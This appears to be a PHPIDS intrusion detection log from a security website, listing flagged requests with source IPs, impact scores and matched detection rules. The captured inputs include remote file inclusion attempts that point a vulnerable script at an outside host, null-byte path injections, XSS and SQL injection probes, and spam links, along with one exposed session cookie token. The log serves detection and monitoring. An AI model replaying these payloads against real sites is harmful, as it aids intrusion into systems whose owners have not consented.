| ID: | 123020 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=23874815&CFTOKEN#=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#lastvisit={ts '2010-04-22 18:33:30'}#timecreated={ts '2010-04-22 18:33:30'}#hitcount=2#cftoken=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#cfid=23874815# | | Page: | / | | IP: | 69.175.7.130 | | Impact: | 64 | | Created: | 2010-04-30 00:36:27 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0833333333333 Converted: ((((+::
|
| ID: | 123017 | | Name: | REQUEST.page | | Value: | --'security'/h | | Page: | /i.php?page=--%27security%27/h | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-04-30 00:23:48 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123018 | | Name: | GET.page | | Value: | --'security'/h | | Page: | /i.php?page=--%27security%27/h | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-04-30 00:23:48 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123015 | | Name: | REQUEST.codeme | | Value: | Only, <a href= http://virtualdatinggame.imagekind.com/#1 >virtual dating game free</a> [url=http://virtualdatinggame.imagekind.com/#1]virtual dating game free[/url], %))), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-30 00:00:43 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++::
|
| ID: | 123016 | | Name: | POST.codeme | | Value: | Only, <a href= http://virtualdatinggame.imagekind.com/#1 >virtual dating game free</a> [url=http://virtualdatinggame.imagekind.com/#1]virtual dating game free[/url], %))), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-30 00:00:43 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++::
|
| ID: | 123013 | | Name: | REQUEST.page | | Value: | <script>security/barcode-asciiscript | | Page: | /i.php?page=%3Cscript%3Esecurity/barcode-asciiscript | | IP: | 67.195.111.36 | | Impact: | 16 | | Created: | 2010-04-29 20:08:38 | | Details: | Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
|
| ID: | 123014 | | Name: | GET.page | | Value: | <script>security/barcode-asciiscript | | Page: | /i.php?page=%3Cscript%3Esecurity/barcode-asciiscript | | IP: | 67.195.111.36 | | Impact: | 16 | | Created: | 2010-04-29 20:08:38 | | Details: | Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
|
| ID: | 123011 | | Name: | REQUEST.page | | Value: | videos/keyllama-<acronym title= | | Page: | /i.php?page=videos/keyllama-%3Cacronym%20title= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-04-29 19:36:35 | | Details: | Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123012 | | Name: | GET.page | | Value: | videos/keyllama-<acronym title= | | Page: | /i.php?page=videos/keyllama-%3Cacronym%20title= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-04-29 19:36:35 | | Details: | Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123009 | | Name: | REQUEST.codeme | | Value: | I like it so much, <a href= http://hallmarkcards.imagekind.com/#1 >hallmark cards</a> [url=http://hallmarkcards.imagekind.com/#1]hallmark cards[/url], 8-)), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-29 17:45:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123010 | | Name: | POST.codeme | | Value: | I like it so much, <a href= http://hallmarkcards.imagekind.com/#1 >hallmark cards</a> [url=http://hallmarkcards.imagekind.com/#1]hallmark cards[/url], 8-)), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-29 17:45:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123007 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 17:08:24 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123008 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 17:08:24 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123005 | | Name: | REQUEST.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 17:08:19 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123006 | | Name: | GET.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 17:08:19 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123003 | | Name: | REQUEST.codeme | | Value: | Perfect work, <a href= http://bearinbeercooler.imagekind.com/ >bear in beer cooler</a>, [url= http://bearinbeercooler.imagekind.com/ ]bear in beer cooler[/url], ivwx, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 16:56:02 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123004 | | Name: | POST.codeme | | Value: | Perfect work, <a href= http://bearinbeercooler.imagekind.com/ >bear in beer cooler</a>, [url= http://bearinbeercooler.imagekind.com/ ]bear in beer cooler[/url], ivwx, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 16:56:02 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123001 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:49:18 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123002 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:49:18 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122999 | | Name: | REQUEST.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:49:17 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123000 | | Name: | GET.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:49:17 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122997 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:46:19 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122998 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:46:19 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122995 | | Name: | REQUEST.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:46:15 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122996 | | Name: | GET.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 173.61.105.153 | | Impact: | 10 | | Created: | 2010-04-29 16:46:15 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122993 | | Name: | REQUEST.codeme | | Value: | Excellent site. It was pleasant to me., <a href= http://vodkalimesugarice.imagekind.com/#1 >vodka lime sugar ice price</a> [url=http://vodkalimesugarice.imagekind.com/#1]vodka lime sugar ice price[/url], %-), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-29 16:06:47 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++::
|
| ID: | 122994 | | Name: | POST.codeme | | Value: | Excellent site. It was pleasant to me., <a href= http://vodkalimesugarice.imagekind.com/#1 >vodka lime sugar ice price</a> [url=http://vodkalimesugarice.imagekind.com/#1]vodka lime sugar ice price[/url], %-), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-29 16:06:47 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++::
|
| ID: | 122991 | | Name: | REQUEST.codeme | | Value: | So where it to find, <a href= http://shoecarnival.imagekind.com/ >shoe carnival online</a>, [url= http://shoecarnival.imagekind.com/ ]shoe carnival online[/url], ycq, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 15:17:08 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122992 | | Name: | POST.codeme | | Value: | So where it to find, <a href= http://shoecarnival.imagekind.com/ >shoe carnival online</a>, [url= http://shoecarnival.imagekind.com/ ]shoe carnival online[/url], ycq, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 15:17:08 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122990 | | Name: | GET.page | | Value: | doomsday/nuclear-war-survival"%20rel="nofollow"> | | Page: | /i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e | | IP: | 67.195.111.36 | | Impact: | 42 | | Created: | 2010-04-29 14:54:17 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 122989 | | Name: | REQUEST.page | | Value: | doomsday/nuclear-war-survival"%20rel="nofollow"> | | Page: | /i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e | | IP: | 67.195.111.36 | | Impact: | 42 | | Created: | 2010-04-29 14:54:16 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 122985 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:44:22 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122986 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:44:22 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122987 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:44:22 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122988 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:44:22 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122981 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:44:06 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122982 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:44:06 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122983 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:44:06 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122984 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:44:06 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122977 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:49 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122978 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:49 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122979 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:49 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122980 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:49 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122973 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:47 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122974 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:47 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122975 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:47 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122976 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:47 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122969 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:33 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122970 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 20 | | Created: | 2010-04-29 13:43:33 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122971 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:33 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122972 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head?? | | IP: | 204.15.190.163 | | Impact: | 26 | | Created: | 2010-04-29 13:43:33 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122967 | | Name: | REQUEST.codeme | | Value: | Your Site Is Great!, <a href= http://paylessshoes.imagekind.com/#1 >payless shoes</a> [url=http://paylessshoes.imagekind.com/#1]payless shoes[/url], 55454, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 13:12:09 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122968 | | Name: | POST.codeme | | Value: | Your Site Is Great!, <a href= http://paylessshoes.imagekind.com/#1 >payless shoes</a> [url=http://paylessshoes.imagekind.com/#1]payless shoes[/url], 55454, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-29 13:12:09 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122965 | | Name: | REQUEST.codeme | | Value: | Great, <a href= http://raybansunglasses.imagekind.com/ >ray ban sunglasses</a>, [url= http://raybansunglasses.imagekind.com/ ]ray ban sunglasses[/url], iud, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 12:21:14 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122966 | | Name: | POST.codeme | | Value: | Great, <a href= http://raybansunglasses.imagekind.com/ >ray ban sunglasses</a>, [url= http://raybansunglasses.imagekind.com/ ]ray ban sunglasses[/url], iud, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-29 12:21:14 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122963 | | Name: | REQUEST.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.28 | | Impact: | 12 | | Created: | 2010-04-29 11:51:39 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
